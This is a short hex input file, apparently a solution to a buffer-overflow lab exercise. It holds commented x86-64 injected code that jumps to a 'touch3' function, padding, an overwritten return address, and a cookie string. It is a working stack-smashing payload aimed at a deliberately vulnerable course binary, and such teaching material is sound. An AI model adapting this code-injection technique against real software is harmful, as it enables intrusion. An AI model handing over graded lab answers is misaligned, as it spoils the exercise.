/* Injected code sum up to 13 bytes */
48 c7 c7 a8 dc 61 55 	/* mov    $0x5561dca8,%rdi -- Set the first parameter as start position of input string (7 bytes) */
68 fa 18 40 00       	/* push   $0x4018fa -- Push &touch3 to stack (5 bytes) */
c3                   	/* ret -- Switch control to function 'touch3' (1 byte) */


/* Placeholder, 27 bytes */
00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00

/* Corrupt the next instruction to be our injected code */
78 dc 61 55 00 00 00 00

/* Corrupt next stack element to be our cookie */
35 39 62 39 39 37 66 61
00
